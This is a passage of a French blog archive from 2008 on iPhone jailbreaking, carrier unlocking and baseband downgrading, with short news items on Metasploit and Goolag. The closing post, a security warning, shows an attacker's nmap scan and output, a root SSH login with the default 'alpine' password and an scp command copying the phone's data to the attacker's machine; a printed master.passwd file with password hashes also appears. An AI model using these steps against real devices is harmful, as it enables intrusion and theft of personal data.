Pwnagetool 2.0 a été releasé cette nuit : jailbreakons nos iphone 3G et le firmware 2.0

C’est très tôt ce dimanche (vers une heure et demie du matin) que la devTeam a finalisé et choisi de releasé Pwnagetool 2.0 qui doit nous permettre de faire à peut prêt ce que nous voulons avec nos iPhone 3g ou pas !

En quelques heures, ce sont prêt de 2000 commentaires et remerciements qui dont venus orner le fil de commentaire de ce post que tout le monde attendais

Telecharger pwnagetools 2.0 et ici aussi

It’s gonna be a hacky sunday, je finis mon café, je m’y mets tout de suite et je vous raconte tout ça 😉

allez ok j'upgrade mon itune :)
allez ok j'upgrade mon itune 🙂

Comment downgrader son iPhone en 1.1.4

Mes petites notes de galère étaient assez cryptiques, je vous propose donc de suivre ces grandes étapes en espérant que ce soit un peu plus clair 😉
Attention cependant c’est peut être un calcul peu judicieux de se lancer là dedans ce weekend vu que pwnagetools 2.0 est attendu pour le début de la semaine prochaine. Si un peu de patience peut vous éviter de vous lancer dans des manipulations hasardeuses de bootneuter, c’est surement la meilleure attitude à adopter. Maintenant si comme moi vous n’arrivez plus à vous passer de votre téléphone, voici comment j’ai procédé :

Ce dont j’ai eu besoin :

  • un mac
  • un windows

Symptôme : Une fois le firmware 2.0 installé : impossible d’obtenir le réseau de son opérateur tiers.

On va donc repasser en 1.1.4

Etape 1 : downgrade vers iTune 7.5

Sur le mac : on downgrade iTune en sa version 7.5, le voici pour mac et pour windows mais cependant il faut vraiment penser à nettoyer correctement la version précédente. Voici comment faire :

  • on vire itune du répertoire applications
  • on ouvre un terminal pour faire le ménage proprement :

$ rm -r /System/Library/PrivateFrameworks/MobileDevice.framework
$ rm -r /Library/Receipts/iTunesX.pkg
$ rm -r /Library/Preferences/com.apple.iTunes*

Etape 2 : installation du firmware 1.1.4 via iTune 7.5

nb : je suis toujours sur le mac

On récupère le firmware 1.1.4

$ cd Desktop
$ wget http://appldnld.apple.com.edgesuite.net/content.info.apple.com/iPhone/061-4313.20080226.Sw39i/iPhone1,1_1.1.4_4A102_Restore.ipsw

On relance l’iPhone en mode restauration puis, en maintenant la touche Alt sur un mac ou shift sur windows on clique sur restaurer afin de choisir le firmware que nous venons de downloader.

Le firmware doit s’installer mais nous devons obtenir une erreur type 10xx (chez moi 1015), Attention si vous avez une erreur 16.. c’est pas bon, il faut recommencer le donwgrade en 1.1.4, la cause possible est que votre iTune n’a pas été correctement downgradé.

Etape 3 : On check sa version de baseband

Mon iPhone me propose uniquement le call for emergency vu qu’il n’est pas activé, ça va me permettre de vérifier mon baseband :
Je tape *3001#12345#* puis je valide l’appel, j’arrive sur une page nomées Field Test qui donne quelques infos, dont le champs qui nous intéresse : Version
a ce stade, j’ai une version 04.05.04_G

Etape 4 : le jailbreak et install de bootneuter

je passe maintenant sur un windows avec iLiberty : je lance le jailbreak et l’install de cyndia et de bootneuter

J’utilise aussi iLiberty pour sortir du DFU mode simplement… penser à se laver les mains après l’utilisation du Windows.

Etape 5 : le downgrade du Baseband :

Sur mac : je récupère une version patchée de ZiPhone 3 ici

Je coche l’option baseband downgrading, je lance l’opération. Ca fonctionne, pour m’en assurer je recheck la version de baseband en tapant *3001#12345#*, chez moi j’obtiens : 04_03_13_G

Etape 6 : bootloader et unlock

Sur l’iPhone Je lance bootneuter que j’ai préalabement installé : je choisis neuter et unlock, si vous obtenez encore une erreur 5, rebootez simplement votre iPhone. A ce stade vous devriez avoir une bonne surprise 😉

Rappel :

Pour passer en DFU Mode :

  • vous fermez iTune,
  • vous maintenez les touches home et power de l’iPhone pressées pendant exactement 10 secondes puis vous relâchez le POWER (le bouton d’en haut) en maintenant toujours le home (celui du bas) pressé.
  • Attention en mode DFU l’écran est doit rester noir comme si votre iPhone était éteint, ceci est normal, en revanche iTune, lui s’est lancé.

Déblocage et jailbreak du firmware 2.0 de l’iPhone

Moins de 24h après son lancement officiel plusieurs videos diffusées sur Youtube font état de desimlockage et de jailbreak sur le firmware 2.0. Cependant, il n’existe pas encore d’outil graphique permettant de réaliser toutes les étapes simplement.. enfin il existe mais il n’est pas encore releasé et les étapes restent encore assez nombreuses comme vous allez le voir sur la vidéo qui suit. La DevTeam est évidemment encore une fois de la partie, et je vous invite donc à suivre de très près leur wiki dans l’attente d’une nouvelle version de Pwnage par exemple 🙂

Voici en image ce que ça nous donne :

Petit guide d’installation du firmware 2.0 de l’iPhone, et restauration en 1.1.4

Des efforts sur la sécurité : d’importantes failles (notamment celles de Safari) ont été corrigées, cette mise à jour est donc de ce point fort utile. Sachez que pour l’instant si votre iphone est jailbreaké et que surtout vous n’êtes pas chez Orange, cet upgrade est une très mauvaise idée car il n’existe pas encore de manière propre et sécurisante de downgrader. Il va falloir flasher le bootloader ou patienter pour avoir un outil graphique le permettant, mais pendant ce temps, vous n’aurez plus de téléphone.

Passer l’iPhone en firmware 2.0 : La mise à jour d’iTune est nécessaire, veuillez donc procéder à la mise à niveau vers la version 7.7 Branchez votre iPod ou votre iPhone une fois la mise à jour effectuée, vous devriez voir apparaître une notification de mise à jour pour votre périphérique.

Détection de l\'iPod

Pour un ipod, la mise à jour vers le firmware 2.0 est payante.

Mise à jour payante pour le firmware 2.0 sur un ipod

Pour un iPhone, vous pouvez y accéder gratuitement

lancement mise a jour
Commencez par accepter la licence d’utilisation d’Apple

Acceptation de la licence Apple pour le firmware 2.0 de l\'iPhone

Vous pouvez ensuite télécharger le firmware seulement ou le télécharger puis l’installe

téléchargement du firmware2.0 de l\'iPhone

Une fois downloadé, le firmware s’extrait et on peut passer à la restauration

La première restauration restauration

Suivra une étape de vérification du firmware

Puis encore une étape de restauration du programme interne

La restauration du programme interne pendant la mise à jour vers le firmware 2.0

Un avertissement vous indique que votre iPhone va redémarrer

redémarrage après la mise à jour vers le firmware 2.0 de l\'iPhone

Une fois le redémarrage effectué, nous entrons dans le vif du sujet, si vous êtes chez Orange, tant mieux pour vous, c’est sensé fonctionner 🙂 . Mais si vous n’êtes pas chez Orange ou un opérateur « compatible » selon les termes d’Apple, comprenez compatible pour leur porte-feuille 🙂

Il va donc nous falloir desimlocker notre iPhone, un petit tour sur le blog de ZiPhone nous permet de déduire que l’auteur est assez blasé de la pression qu’on lui met, il a bien raison. On peut tout de même espérer de sa part une prochaine release qui permettra le desimlockage. Nous voilà donc avec un iPhone inutilisable, il va falloir … downgrader et attendre patiemment une solution plus viable

Repassage au firmware 1.1.14

Tout d’abord, voici les liens vers les firmwares antérieurs, ça peut toujours servir … la preuve.

On relance donc encore une fois l’iPhone en mode restauration puis, en maintenant la touche Alt sur un mac ou shift sur windows on clique sur restaurer afin de choisir le firmware que nous venons de downloader

Iphone restoration from the local filesystem

En tentant de restaurer le 1.1.4, ma première tentative se solde par une erreur

Je retente avec les firmwares 1.1.3 et 1.1.4,, rien à faire. En fait, j’ai l’impression d’être en DFU Mode mais l’iPhone ne se comporte pas normalement, il y a donc autre chose, donc on va tout simplement downgrader iTune vers la version 7.5, celle qui était valide à l’époque du firmware 1.1.4. Le voici pour OSX et aussi pour Windows. Attention de bien desinstaller la version précedente d’iTune (pensez bien a supprimer les fichiers iTune Library et iTune Music Library.xml).

Attention tout se joue maintenant, il va falloir repasser en DFU, voici la manipulation trouvée ici (j’aurais sûrement bien moins galéré si j’avais trouvé ce tuto avant):

  • vous fermez iTune,
  • vous maintenez les touches home et power de l’iPhone pressées pendant exactement 10 secondes puis vous relâchez le POWER (le bouton d’en haut) en maintenant toujours le home (celui du bas) pressé.
  • Attention en mode DFU l’écran est doit rester noir comme si votre iPhone était éteint, ceci est normal, en revanche iTune, lui s’est lancé.

restoration en 1

Il prépare l’iPhone pour la restauration, à ce moment, l’iPhone s’allume, …génial j’obtiens toujours une erreur mais pas la même, cette fois c’est une 1015 … c’est bien ce que nous voulions donc pas de problème. Il faut donc maintenant sortir du DFU mode, pour ce faire j’ai utilisé iLiberty. Pensant que l’ancien bootloader pourrait m’être utile j’ai sélectionné dans iLiberty cette option avant de lancer le Jailbreak. J’ai installé ensuite bootneuter toujours via iLiberty. pendant les opérations de ce dernier, il semble que le unlock n’ai pas fonctionné : ma carte sim bouygues n’est pas reconnue. J’installe anysim : c’était sensé fonctionner en 1.1.3, sachez que ce n’est pas le cas avec le 1.1.4, l’opération se solde par un « cannot flash firmware ». D’ailleur Bootneuter ui non plus n’arrive plus à repasser sur le bootloader 4.6. Le Neuter et le unlock ne fonctionnent pas.

Je décide donc de tenter une autre méthode. Jusque là je voulais éviter ZiPhone puisque j’avais une erreur : USBMuxListenerCreate: Permission denied quand je tentais le unlock. Je décide donc pour la énième fois de réinstaller un firmware 1.1.4. Je vais tenter de ne pas toucher le bootloader et d’utiliser directement Ziphone3

On va donc lancer notre dévolu sur un autre outil : PwnageTool, l’excellent outil de la DevTeam qui depuis quelques heures nous permet de désinguer du 2.0 … cool, on va tenter cette méthode. Je réupgrade iTune à la dernière version et je réinstalle le firmware 2.0… A la fin de l’upgrade j’ai le message d’erreur me signalant qu’il manque la sim ou qu’elle est bloquée.

Je vais donc, encore une fois downgrader mon iTune en 7.5 cette fois cis je prends soin de penser à désinstaller le mobileDevice Framework :

bash-3.2# rm -r /System/Library/PrivateFrameworks/MobileDevice.framework

et encore ceci :

bash-3.2# rm -r /Library/Receipts/iTunesX.pkg
bash-3.2# rm ~/Library/Preferences/com.apple.iTunes*

J’installe donc mon iTune7.5, une fois ok, je branche mon iPhone, j’obtiens ce sympathique message qui m’invite a upgrader à la nouvelle version d’itune, mais ce n’est pas trop ce que je cherche

iphone wants itune 7.7

Je vais donc devoir rebooter l’iPhone en DFU comme expliqué précédemment. Ecran noir sur l’iPhone qui est en DFU iTune lui détecte l’iPhone en mode récupération et la je lance une restauration du firmware 1.1.4 que j’avais précédemment téléchargé. Cool j’obtiens l’erreur 1015, alors que sur cette machine (un mac) j’avais une 1604 qui m’avait obligé à faire l’opération sur un iTune 7.6.2 sur un windows.

Je downloade donc ceci, mais encore une fois, je me retrouve le bec dans l’eau,

iPwner failed

je relance iPwner encore une fois comme j’avais eu des avertissements a cause d’iTune, et la miracle … enfin un truc qui fonctionne !!

iPwner ok

Je vais donc maintenant m’assurer que j’ai bien le baseband attendu, pour ceci il y a une petite astuce :

allez dans le emergency call et taper ceci : *3001#12345#* validez l’appel, et du coup vous arrivez sur une page nomées Field Test qui vous donne quelques infos, dont le champs qui nous intéresse : Version :

j’ai une version : 04.05.04_G

je passe maintenant sur un windows avec iLiberty : je lance le jailbreak et l’install de cyndia pour installer des packages et applique également l’activation.

L’iPhone est maintenant complètement restauré, en revanche la carte sim reste verrouillée, une fois déverouillées, toujours pas de téléphone. Je lance donc ZiPhone, puis sur l’onglet advanced je sélectionne « unlock phone for any carrier », puis je valide avec le bouton du dessous « start advanced Process » … je reste bloqué la dessus :

ziphone planté

rien ne se passe, je le kill.

Je repasse sur iLiberty et je lance l’installation de Bootneuter, mais quand je tente de flasher avec l’option Neuter en 3.9, je me prends une erreur 5.

Ce post sur Hackint0sh va m’être utile vu que je soupçonne que ma version de baseband ne convient pas, j’ai une 04.05.04_G alors que je devrais avoir une 04.04.xx pour que ça se passe bien. Pour ce faire on va utiliser une version patchée de ZiPhone que l’on trouve ici. Le baseband 04.04.xx devrait fonctionner avec les deux bootloader.

Je lance donc le downgrade de baseband

l’iPhone semble réagir comme voulu, on aperçoit même un « patching unlock » sur l’écran de l’iPhone pendant l’application de la procédure. Cette fois ça y est le baseband qui était sûrement la cause de mes malheurs est maintenant downgradé, vérification dans le emergency call en tapant ceci : *3001#12345#* et sur le Field Test j’ai maintenant une version 04_03_13_G 🙂

Instant de vérité maintenant, je vais tenté de relancer bootneuter. je choisis neuter et unlock… et PAN encore une erreur5, je reboot tout simplement l’iPhone.

Et devinez quoi ? mais cette fois c’est gagné, le réseau bouygues apparaît au moment ou rentre mon code pin 🙂

Me revoilà en 1.1.4 avec un vieux bootloade, jailbreaké, le téléphone refonctionne, mais ça aura été chaud.

Sécurité : transformer un iPhone en redoutable outil d’audit et de pénétration avec Metasploit 3

iphone hackers runs metasploitLe framework d’attaque Metasploit s’était déjà introduit dans les routeurs linksys wrt54 via Fairuza, un firmware maison qui embarquait un arsenal à faire passer Kevin Meatnik pour un gamer. Nous avons également installé metasploit sur un prototype de Fonera puisque nous bénéficions d’un chipset atheros, très compatible avec aircrack, puisqu’idéal pour réaliser de l’injection 🙂

Avec la récente arrivée d’aircrack à l’arsenal de l’iPhone, il fallait bien se douter que ce terminal deviendrait de fait un outil de prédilection pour une communauté de plus 🙂

Metasploit est un outil à ne pas mettre dans toutes les mains, se nourrissant des derniers 0day exploits, il est capable de générer des payloads et d’automatiser des attaques sur des ranges ip entiers… en outre, il offre une plateforme de développement hallucinante pour les auditeurs et experts en sécurité (il dispose par exemple en stadard d’une interprèteur Ruby et d’un interpréteur Python).

Pour en savoir plus sur l’installation de Metasploit 3 sur un iPhone.

Googlag : le moteur de recherche hacktiviste qui trouve des trucs … ben ouai des trucs quoi …

Goolag, c’est le dernier coup de communication du cDc le Cult of the Dead Cows, prestigieuse team de hackers à qui l’on doit entre autres le légendaire cheval de troie, Back Orifice. Avec une bonne dose d’humour, le cDc a lancé son moteur de recherche hacktiviste engagé contre la logo.jpgcensure opérée par le gouvernement chinois sur Internet (en fait on peut mettre la France dans le même panier, c’est ce vers quoi nous nous orientons : le filtrage du Net). C’est drôle, pas dénué de sens, et ça trouve la même chose que Google vu que .. c’est du Google. La blague pourrait s’arrêter là, mais non, Goolag scanner est en fait une application qui tire le meilleur parti de Google pour aller chercher des choses sur le net … beaucoup de choses, des choses qu’un certain Johnny nous avait appris à trouver.

Pour l’instant l’outil Goolag Scanner n’est disponible que sur Windows et peut être downlodé ici.

Pour l’instant, la promesse de Goolag, c’est d’offrir du p0rn aux chinois, le cDc devrait être déclaré d’intérêt public.

Découvrir Goolag Scanner

ZiPhone en pratique : désimlocking et jailbreak en quelques clics

Petit teste de ZiPhone : jailbreaker un iPhone en 1.1.4 en toute simplicité, ou presque

J’ai franchi le cap en mettant à jour mon iPhone pour tester ZiPhone. Petit rappel, il s’agit d’un iPhone US tout récent, livré en 1.1.3, jailbreaké avec Independence et utilisé sur le réseau de Bouygues.

Voici donc comment je m’y suis pris cette fois ci :

  • iTune est à jour
  • j’ai backuppé mes données
  • je downloade ZiPhone
  • j’ouvre ZiPhone pour voir à quoi ça ressemble et j’en profite pour jeter un coup d’oeil rapide au ReadMe file c’est toujours instructif.

Le fichier readme de Ziphone

  • je branche l’iPhone sur son socle relié à mon mac,
  • iTune se lance m’informe d’une mise à jour dispo en 1.1.4,
  • je lance la procédure d’upgrade du firmware
  • le firmware se télécharge
  • l’iPhone se prépare à la mise à jour, là il va falloir être très patient, allez vous faire un café.

pendant ce temps … long, très long, une dizaine de minutes, l’iPhone reboot une fois…

  • 20 minutes après je commence à trouver le temps un peu long du coup je débranche l’iPhone, impossible d’arrêter iTune qui part en sucette, un kill à coup de terminal … rien à faire, je suis obligé de rebooter le mac à la barbare …
  • je redémarre … re splendide erreur.
  • J’éteins complètement l’iPhone, je le reconnecte, je retente la restauration, à c e stade tout se passe impeccablement bien.
  • la restauration passe au poil, ce sera mon lot de consolation
  • Restauration de l’Iphone

    l’iPhone reboot mais simlocké

  • l’iPhone reboot mais évidemment, il est simlocké :\ … je vais enfin pouvoir tester notre ziPhone !
  • je le lance et je choisis la première option (do it all) dans mon cas puisque je repars from scratch sur l’iPhone, ça reboot en mode text et ça injecte tout notre petit monde, comme sur Independence lors de mon premier contact avec l’iPhone, on voit bien toutes les étapes des opérations lancées par ZiPhone.

  • l’iPhone reboot encore une fois, mais cette fois c’est parfait, le voilà jailbreaké désimlocké, l’installer.app est là, il ne me reste plus qu’à réinstaller mes applications, restaurer mes mails, mes préférences, mes 4 mp3 qui se battent en duel.

    ZiPhone termine son oeuvre

  • A noter une nouvelle icone ZiBri qui donne accès au blog, c’est parfait je la conserve 🙂 Une belle application open source, merci aux développeurs.

unlocked.jpg

Si à la fin, en essayant d’installer des applications vous avez une erreur de type Package download failed, commencez par faire un clear queue, puis installez en priorité le BSDSubSystemTool. Au besoin redémarrez votre iPhone, pour moi ça a suffit à venir à bout de ce petit désagrément

ZiPhone 2.5 : le firmware 1.1.4 de l’iPhone est tombé, jailbreak confirmé

ziphone25.jpgAttention : n’upgradez pas tout de suite ! Si le jailbreak fonctionne, tout n’a pas encore été testé correctement pour l’instant.

Déployé depuis 4 jours, ce firmware n’aura mis que quelques heures à céder à ZiPhone 2.5.

ZiPhone est disponible depuis hier pour Windows comme pour Mac et peut être downloadé ici.

Toujours de plus en plus simples, les applications qui proposent de déplomber les iPhone pullulent. C’est devenu un vrai sport et les délais entre la sortie du firmware et les releases de ce type d’applications se raccourcissent… de là à penser qu’Apple commence à se poser des questions sur sa propre politique de distribution basée sur l’exclusivité avec certains opérateurs, il n’y a qu’un pas.

Make my iPhone sexy : main script execution error avec le firmware 1.1.3

Un scan nmap et c’est le drame

Previously in prison … euh Jailbreak : pas le droit de toucher à passwd sous peine de bricker votre iPhone.
Pour palier la lacune de passwd, j’ai voulu éditer le /etc/master.passwd … manque de bol, impossible d’installer le bsd subsystems tools. Une vieille histoire de permissions foireuses, pas très grave mais blocante pour la suite des opérations : du coup pas de vi, pas de ls, pas de cat, pas de chown …. fâcheux pour les permissions… bref un truc inutilisable. Voici ce qui a fonctionné pour moi :

-sh-3.2# cd /Applications
-sh-3.2# chmod +s Installer.app/Installer

Je redémarre complètement l’iPhone

Je retente l’installation du bsd subsystem tool et hop tout passe comme une lettre à la poste : nous y voici, je peux maintenant éditer à coup de vi mes pass encodés.

-sh-3.2# cat /etc/master.passwd
##
# User Database
#
# Note that this file is consulted when the system is running in single-user
# mode. At other times this information is handled by lookupd. By default,
# lookupd gets information from NetInfo, so this file will not be consulted
# unless you have changed lookupd's configuration.
##
nobody:*:-2:-2::0:0:Unprivileged User:/var/empty:/usr/bin/false
root:/smx7MYTQIi2M:0:0::0:0:System Administrator:/var/root:/bin/sh
mobile:/smx7MYTQIi2M:501:501::0:0:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1::0:0:System Services:/var/root:/usr/bin/false
unknown:*:99:99::0:0:Unknown User:/var/empty:/usr/bin/false
_securityd:*:64:64::0:0:securityd:/var/empty:/usr/bin/false

Ne le faites pas … c’est un splendide moyen de le bricker.

iPhone Hacks : Jailbreakez votre iPhone en 1.1.3 et offrez vos données personnelles aux script kiddies

Un scan nmap et c’est le drameEn m’amusant un peu avec l’iPhone et l’iPod Touch, j’avais constaté certains courants d’air. A plusieurs reprise sur ce blog ou sur Toonux.org, j’ai succinctement abordé les problèmes de sécurité inhérents à la mobilité, certes, mais là… il faut bien avouer qu’avec un iPhone Jailbreaké, on dipsose d’une splendide passoire numérique.

L’objectif de ce blog n’est vraiment pas dispenser des cours magistraux de sécurité et je n’en ai d’ailleurs pas le niveau. Oui mais voilà, ce que j’ai vu de l’iPhone me choque. Le problème dépasse de loin les flow de Safari qui permettent l’installation de l’installer.app.

Avec les firmwares 1.1.1 et 1.1.2, il était relativement aisé de protéger un minimum vos données personnelles (en clair les 8, 16 ou 32go de données que votre iPhone peut accueillir : mp3 … ouai bof, mais surtout carnet d’adresse, mails … passwords …

Ces terminaux disposent d’un système d’exploitation basé sur un Unix « terreux », pas tout à fait sale mais super loin d’être propre. En standard nous avons donc 2 comptes :

  • Un compte root avec lequel on peut faire la pluie et le beau temps
  • Un compte mobile beaucoup plus limité.
  • Très vite après l’installation de l’installer, je vois apparaître un message qui m’horrifie… on ne peut pas utiliser la commande passwd pour changer le password root de l’iPhone sous peine de voir Springboard redémarrer toutes les 5 secondes ! Comprenez que j’ai sshd activé sur mon terminal et que je ne peux pas changer le password root! J’ai beau ne pas être parano, tout ceci me dérange particulièrement. Pourquoi ? tout simplement parce qu’il suffit que je me connecte sur un réseau wifi pour offrir TOUT ce qui est contenu dans mon téléphone à un petit malin ! Pour la faire simple voilà comment un script kiddy peut peut procéder pour me rooter :
  • mon iphone est connecté sur le même réseau wifi qu’un emmerdeur que nous allons appeler Jean-Kevin
  • Jean-kevin est un petit malin qui connaît nmap
  • pour se connecter il va avoir besoin de mon adresse ip
  • un petit ifconfig va lui donner une indication sur la plage ip du routeur dont le serveur dhcp attribue aussi l’ip de mon iphone, si l’ip de ce routeur ressemble à ça 192.168.0.1 il va pouvoir scanner simplement toutes les machines du réseau à la recherche d’une victime

Il lancera par exemple cette commande :

Quicksilver:~ Jean-Kevin$ sudo nmap -sS -v -O 192.168.0.1/24

ce qui lui retournera au moment ou le scanne passera sur l’ip de mon iPhone ceci :

Starting Nmap 4.20 ( http://insecure.org ) at 2008-02-16 23:40 CET
Initiating ARP Ping Scan at 23:40
Scanning 192.168.0.46 [1 port]
Completed ARP Ping Scan at 23:40, 0.15s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:40
Completed Parallel DNS resolution of 1 host. at 23:40, 0.03s elapsed
Initiating SYN Stealth Scan at 23:40
Scanning 192.168.0.46 [1697 ports]
Discovered open port 22/tcp on 192.168.0.46
Increasing send delay for 192.168.0.46 from 0 to 5 due to 173 out of 575 dropped probes since last increase.
Increasing send delay for 192.168.0.46 from 5 to 10 due to 52 out of 172 dropped probes since last increase.
Increasing send delay for 192.168.0.46 from 10 to 20 due to max_successful_tryno increase to 4
Completed SYN Stealth Scan at 23:40, 24.56s elapsed (1697 total ports)
Initiating OS detection (try #1) against 192.168.0.46
Retrying OS detection (try #2) against 192.168.0.46
Retrying OS detection (try #3) against 192.168.0.46
Retrying OS detection (try #4) against 192.168.0.46
Retrying OS detection (try #5) against 192.168.0.46
Host 192.168.0.46 appears to be up ... good.
Interesting ports on 192.168.0.46:
Not shown: 1695 closed ports
PORT STATE SERVICE
22/tcp open ssh
692/tcp filtered unknown
MAC Address: 00:1E:C2:C6:F4:C2 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see http://insecure.org/nmap/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=4.20%D=2/16%OT=22%CT=1%CU=40160%PV=Y%DS=1%G=Y%M=001EC2%TM=47B7666
OS:9%P=i386-apple-darwin9.1.0)SEQ(SP=0%GCD=1%ISR=1B%TI=I%II=I%SS=S%TS=1)SEQ
OS:(SP=0%GCD=1%ISR=1A%TI=I%II=I%SS=S%TS=1)SEQ(SP=0%GCD=1%ISR=1B%TI=I%TS=1)S
OS:EQ(SP=0%GCD=1%ISR=1A%TI=I%II=I%SS=S%TS=1)OPS(O1=M5B4NW0NNT11SLL%O2=M5B4N
OS:W0NNT11SLL%O3=M5B4NW0NNT11%O4=M5B4NW0NNT11SLL%O5=M5B4NW0NNT11SLL%O6=M5B4
OS:NNT11SLL)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFFF)ECN(R=Y%DF=
OS:Y%T=40%W=FFFF%O=M5B4NW0SLL%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q
OS:=)T2(R=Y%DF=Y%T=40%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=N)T4(R=Y%DF=Y%T=40%W
OS:=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
OS:T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=N%T=40%W=0%S=Z%A=S
OS:%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%TOS=0%IPL=38%UN=0%RIPL=G%RID=G%RIPCK=G
OS:%RUCK=0%RUL=G%RUD=G)IE(R=Y%DFI=S%T=40%TOSI=S%CD=S%SI=S%DLI=S)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Incremental
OS detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .
Nmap finished: 1 IP address (1 host up) scanned in 37.377 seconds
Raw packets sent: 3325 (150.770KB) | Rcvd: 1824 (75.380KB)

… on voit donc ici très clairement qu’un appareil au fingerprint un peu space dont la mac adress trahira vite la nature : sur le réseau wifi se trouve un iPhone dont l’ip est 192.168.0.46 qui dispose du port ssh ouvert !

ce qui nous donne dans la tête de notre Jean-Kevin :

iPhone+ssh open+firmware 1.1.3 sur lequel je ne peux pas changer le pass root qui est « alpine » = une splendide opportunité de briller en société en se faisant passer pour un super hacker. Il ne lui reste plus qu’à porter le coup de grâce :

en lançant l’inévitable :


ssh [email protected]

entrer le password « alpine » au prompt

et hop, le voici connecté en root à mon iphone.

Mais comme Jean-Kevin en plus d’être un branleur est aussi un super lamer, il va vous voler vos données avec un :

Quicksilver:~ Jean-Kevin$scp -r /* [email protected]:/home/mesfilesdeh@X0r

… et voilà que Jean-Kevin vient de copier tout le contenu de votre iPhone sur sa machine !

Encore une fois, vous voilà prévenus, un iPhone Jailbreaké avec un firmware 1.1.3 vous empêchant de modifier votre password root est une véritable catastrophe niveau sécurité, évitez donc de vous connecter à n’importe quel réseau wifi, particulièrement dans les lieux publics. Si vous ne savez pas ce que vous faites .. ne le faites pas. Ne perdez pas de vue que quel que soit la version de votre firmware, ne pas changer votre password root ou celui du compte mobile vous expose à cette vulnérabilité dont certain diront qu’il s’agit d’une fonctionnalité 😉